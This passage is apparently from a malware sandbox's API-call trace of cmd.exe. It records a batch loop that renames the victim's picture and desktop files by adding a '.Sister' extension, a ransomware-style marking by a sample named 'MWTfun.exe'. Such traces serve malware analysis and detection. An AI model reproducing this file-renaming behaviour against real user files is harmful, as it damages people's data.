hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0293.829] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.829] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed9336d90*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed9336d90*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0293.830] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"RPjY4uqao.bmp\" \"RPjY4uqao.bmp.Sister\" ") returned 40 [0293.830] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.830] GetFileType (hFile=0x50) returned 0x2 [0293.830] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.830] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0293.830] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.830] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x28, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x28) returned 1 [0293.831] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe558 | out: _Buffer=" & ") returned 3 [0293.831] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.831] GetFileType (hFile=0x50) returned 0x2 [0293.831] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.831] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0293.831] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.831] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0293.831] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0xa6cf4fe528 | out: _Buffer="for") returned 3 [0293.831] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.831] GetFileType (hFile=0x50) returned 0x2 [0293.831] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.832] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0293.832] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.832] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3) returned 1 [0293.832] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" %a in ") returned 7 [0293.832] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.832] GetFileType (hFile=0x50) returned 0x2 [0293.832] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.832] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0293.833] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.833] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x7) returned 1 [0293.833] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0xa6cf4fe528 | out: _Buffer="(\"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe\") do ") returned 85 [0293.833] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.833] GetFileType (hFile=0x50) returned 0x2 [0293.833] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.833] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0293.834] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.834] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x55, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x55) returned 1 [0293.839] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.839] GetFileType (hFile=0x50) returned 0x2 [0293.839] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.839] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0293.839] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.839] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed93371d0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed93371d0*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0293.839] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"RPjY4uqao.bmp.Sister\" \"RPjY4uqao.bat\" ") returned 40 [0293.839] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.840] GetFileType (hFile=0x50) returned 0x2 [0293.840] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.840] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0293.840] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.840] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x28, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x28) returned 1 [0293.841] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0293.841] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.841] GetFileType (hFile=0x50) returned 0x2 [0293.841] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.841] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0293.841] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.841] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0293.861] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe240, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0293.862] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0293.862] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0293.862] malloc (_Size=0xffce) returned 0x21ed991f940 [0293.862] ??_V@YAXPEAX@Z () returned 0x21ed991f940 [0293.862] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0293.862] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0293.862] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0293.862] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0293.862] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0293.862] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0293.862] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0293.862] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0293.862] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0293.862] ??_V@YAXPEAX@Z () returned 0x1 [0293.862] GetProcessHeap () returned 0x21ed8c70000 [0293.862] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb0) returned 0x21ed937c9b0 [0293.863] GetProcessHeap () returned 0x21ed8c70000 [0293.863] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed937c9b0, Size=0x60) returned 0x21ed8d64180 [0293.863] GetProcessHeap () returned 0x21ed8c70000 [0293.863] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d64180) returned 0x60 [0293.863] GetProcessHeap () returned 0x21ed8c70000 [0293.863] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x68) returned 0x21ed8d63ee0 [0293.863] GetProcessHeap () returned 0x21ed8c70000 [0293.863] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb0) returned 0x21ed937c9b0 [0293.863] GetProcessHeap () returned 0x21ed8c70000 [0293.863] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed937c9b0, Size=0x60) returned 0x21ed8d63d90 [0293.863] GetProcessHeap () returned 0x21ed8c70000 [0293.863] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d63d90) returned 0x60 [0293.863] malloc (_Size=0xffce) returned 0x21ed991f940 [0293.865] ??_V@YAXPEAX@Z () returned 0x21ed991f940 [0293.865] GetProcessHeap () returned 0x21ed8c70000 [0293.865] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8cc8380 [0293.865] GetProcessHeap () returned 0x21ed8c70000 [0293.865] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed9305040 [0293.865] _wcsicmp (_String1="RPjY4uqao.bmp", _String2=".") returned 68 [0293.865] _wcsicmp (_String1="RPjY4uqao.bmp", _String2="..") returned 68 [0293.865] GetFileAttributesW (lpFileName="RPjY4uqao.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\rpjy4uqao.bmp")) returned 0x20 [0293.866] GetProcessHeap () returned 0x21ed8c70000 [0293.866] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed9337360 [0293.867] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed9337370 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures") returned 0x18 [0293.867] SetErrorMode (uMode=0x0) returned 0x0 [0293.867] SetErrorMode (uMode=0x1) returned 0x0 [0293.867] GetFullPathNameW (in: lpFileName="RPjY4uqao.bmp", nBufferLength=0x7fe7, lpBuffer=0x21ed991f940, lpFilePart=0xa6cf4fd660 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\RPjY4uqao.bmp", lpFilePart=0xa6cf4fd660*="RPjY4uqao.bmp") returned 0x26 [0293.867] SetErrorMode (uMode=0x0) returned 0x1 [0293.867] GetProcessHeap () returned 0x21ed8c70000 [0293.867] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed9303090 [0293.867] _wcsicmp (_String1="RPjY4uqao.bmp", _String2=".") returned 68 [0293.867] _wcsicmp (_String1="RPjY4uqao.bmp", _String2="..") returned 68 [0293.867] GetFileAttributesW (lpFileName="RPjY4uqao.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\rpjy4uqao.bmp")) returned 0x20 [0293.868] ??_V@YAXPEAX@Z () returned 0x1 [0293.868] malloc (_Size=0xffce) returned 0x21ed991f940 [0293.868] ??_V@YAXPEAX@Z () returned 0x21ed991f940 [0293.868] malloc (_Size=0xffce) returned 0x21ed992f920 [0293.868] ??_V@YAXPEAX@Z () returned 0x21ed992f920 [0293.868] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\RPjY4uqao.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\rpjy4uqao.bmp")) returned 0x20 [0293.868] malloc (_Size=0xffce) returned 0x21ed993f900 [0293.868] ??_V@YAXPEAX@Z () returned 0x21ed993f900 [0293.868] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\RPjY4uqao.bmp", fInfoLevelId=0x1, lpFindFileData=0x21ed9305050, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x21ed9305050) returned 0x21ed8cc7a20 [0293.868] malloc (_Size=0xffce) returned 0x21ed994f8e0 [0293.868] ??_V@YAXPEAX@Z () returned 0x21ed994f8e0 [0293.869] ??_V@YAXPEAX@Z () returned 0x1 [0293.869] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\RPjY4uqao.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\rpjy4uqao.bmp"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\RPjY4uqao.bmp.Sister" (normalized: "c:\\users\\fd1hvy\\pictures\\rpjy4uqao.bmp.sister"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0293.878] FindNextFileW (in: hFindFile=0x21ed8cc7a20, lpFindFileData=0x21ed9305050 | out: lpFindFileData=0x21ed9305050*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x117c9d60, ftCreationTime.dwHighDateTime=0x1d5e33c, ftLastAccessTime.dwLowDateTime=0x43c0f840, ftLastAccessTime.dwHighDateTime=0x1d5ecea, ftLastWriteTime.dwLowDateTime=0x43c0f840, ftLastWriteTime.dwHighDateTime=0x1d5ecea, nFileSizeHigh=0x0, nFileSizeLow=0x4df6, dwReserved0=0x0, dwReserved1=0x0, cFileName="RPjY4uqao.bmp", cAlternateFileName="")) returned 0 [0293.879] GetLastError () returned 0x12 [0293.879] FindClose (in: hFindFile=0x21ed8cc7a20 | out: hFindFile=0x21ed8cc7a20) returned 1 [0293.879] ??_V@YAXPEAX@Z () returned 0x1 [0293.879] ??_V@YAXPEAX@Z () returned 0x1 [0293.879] ??_V@YAXPEAX@Z () returned 0x1 [0293.879] ??_V@YAXPEAX@Z () returned 0x1 [0293.879] GetProcessHeap () returned 0x21ed8c70000 [0293.879] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8cc83e0 [0293.880] GetProcessHeap () returned 0x21ed8c70000 [0293.880] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c95840, Size=0x16) returned 0x21ed8c95aa0 [0293.880] GetProcessHeap () returned 0x21ed8c70000 [0293.880] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c95aa0) returned 0x16 [0293.880] GetProcessHeap () returned 0x21ed8c70000 [0293.880] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d45c20, Size=0x20) returned 0x21ed8d45e00 [0293.880] GetProcessHeap () returned 0x21ed8c70000 [0293.880] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d45e00) returned 0x20 [0293.880] GetProcessHeap () returned 0x21ed8c70000 [0293.880] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x150) returned 0x21ed8d6bda0 [0293.880] GetProcessHeap () returned 0x21ed8c70000 [0293.880] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d6bda0, Size=0xb2) returned 0x21ed937c9b0 [0293.880] GetProcessHeap () returned 0x21ed8c70000 [0293.880] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed937c9b0) returned 0xb2 [0293.881] GetProcessHeap () returned 0x21ed8c70000 [0293.882] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9347350 [0293.882] GetProcessHeap () returned 0x21ed8c70000 [0293.882] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9347350, Size=0x30) returned 0x21ed9347350 [0293.882] GetProcessHeap () returned 0x21ed8c70000 [0293.882] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9347350) returned 0x30 [0293.882] GetProcessHeap () returned 0x21ed8c70000 [0293.882] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9347390 [0293.882] malloc (_Size=0x1ff9c) returned 0x21ed991f940 [0293.882] GetProcessHeap () returned 0x21ed8c70000 [0293.882] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed937ca70 [0293.882] GetProcessHeap () returned 0x21ed8c70000 [0293.882] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xac) returned 0x21ed937cb30 [0293.882] ??_V@YAXPEAX@Z () returned 0x1 [0293.882] malloc (_Size=0x1ff9c) returned 0x21ed991f940 [0293.883] GetProcessHeap () returned 0x21ed8c70000 [0293.883] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed937cef0 [0293.883] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", nBufferLength=0xffce, lpBuffer=0x21ed991f940, lpFilePart=0xa6cf4fdd08 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFilePart=0xa6cf4fdd08*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe") returned 0x4d [0293.883] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x1bf8, cFileName="Users", cAlternateFileName="")) returned 0x21ed8cc84a0 [0293.883] FindClose (in: hFindFile=0x21ed8cc84a0 | out: hFindFile=0x21ed8cc84a0) returned 1 [0293.883] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x1bf8, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8cc7ea0 [0293.883] FindClose (in: hFindFile=0x21ed8cc7ea0 | out: hFindFile=0x21ed8cc7ea0) returned 1 [0293.884] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd623d33f, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xd623d33f, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x1bf8, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8cc7720 [0293.884] FindClose (in: hFindFile=0x21ed8cc7720 | out: hFindFile=0x21ed8cc7720) returned 1 [0293.884] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd623d33f, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xd623d33f, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x1bf8, cFileName="Desktop", cAlternateFileName="")) returned 0xffffffffffffffff [0293.884] malloc (_Size=0x1ff9c) returned 0x21ed993f8f0 [0293.884] ??_V@YAXPEAX@Z () returned 0x21ed993f8f0 [0293.884] GetProcessHeap () returned 0x21ed8c70000 [0293.884] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x74) returned 0x21ed8d677b0 [0293.884] ??_V@YAXPEAX@Z () returned 0x1 [0293.884] ??_V@YAXPEAX@Z () returned 0x1 [0293.884] GetProcessHeap () returned 0x21ed8c70000 [0293.885] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9347390, Size=0x490) returned 0x21ed9347390 [0293.885] GetProcessHeap () returned 0x21ed8c70000 [0293.885] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9347390) returned 0x490 [0293.885] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fddc8 | out: _Buffer="\r\n") returned 2 [0293.885] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.885] GetFileType (hFile=0x50) returned 0x2 [0293.885] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.885] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd58 | out: lpMode=0xa6cf4fdd58) returned 1 [0293.886] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.886] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fdd98, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fdd98*=0x2) returned 1 [0293.891] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures") returned 0x18 [0293.891] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fddd8 | out: _Buffer="C:\\Users\\FD1HVy\\Pictures") returned 24 [0293.892] _vsnwprintf (in: _Buffer=0x21ed8e80190, _BufferCount=0x83cd, _Format="%c", _ArgList=0xa6cf4fddd8 | out: _Buffer=">") returned 1 [0293.892] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.892] GetFileType (hFile=0x50) returned 0x2 [0293.892] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.892] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd88 | out: lpMode=0xa6cf4fdd88) returned 1 [0293.892] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.892] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0xa6cf4fddc8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fddc8*=0x19) returned 1 [0293.893] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.893] GetFileType (hFile=0x50) returned 0x2 [0293.893] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.893] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0293.893] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.893] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed9347360*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x21ed9347360*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x3) returned 1 [0293.894] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe098 | out: _Buffer=" \"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister\" \"CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.bat\" ") returned 144 [0293.894] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.894] GetFileType (hFile=0x50) returned 0x2 [0293.894] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.894] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe028 | out: lpMode=0xa6cf4fe028) returned 1 [0293.894] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.894] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x90, lpNumberOfCharsWritten=0xa6cf4fe068, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe068*=0x90) returned 1 [0293.900] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe0c8 | out: _Buffer="\r\n") returned 2 [0293.900] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.900] GetFileType (hFile=0x50) returned 0x2 [0293.901] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.901] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0293.901] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.901] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x2) returned 1 [0293.908] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde10, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0293.908] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0293.908] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0293.908] malloc (_Size=0xffce) returned 0x21ed991f940 [0293.909] ??_V@YAXPEAX@Z () returned 0x21ed991f940 [0293.909] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0293.909] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0293.909] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0293.909] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0293.909] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0293.909] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0293.909] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0293.909] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0293.909] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0293.909] ??_V@YAXPEAX@Z () returned 0x1 [0293.909] GetProcessHeap () returned 0x21ed8c70000 [0293.909] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d5fbe0 [0293.909] GetProcessHeap () returned 0x21ed8c70000 [0293.909] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d5fbe0, Size=0x130) returned 0x21ed8d56560 [0293.909] GetProcessHeap () returned 0x21ed8c70000 [0293.909] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d56560) returned 0x130 [0293.909] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0293.910] malloc (_Size=0xffce) returned 0x21ed991f940 [0293.910] ??_V@YAXPEAX@Z () returned 0x21ed991f940 [0293.910] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0293.910] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x21ed991f940, nVolumeNameSize=0x7fe7, lpVolumeSerialNumber=0xa6cf4fd960, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: 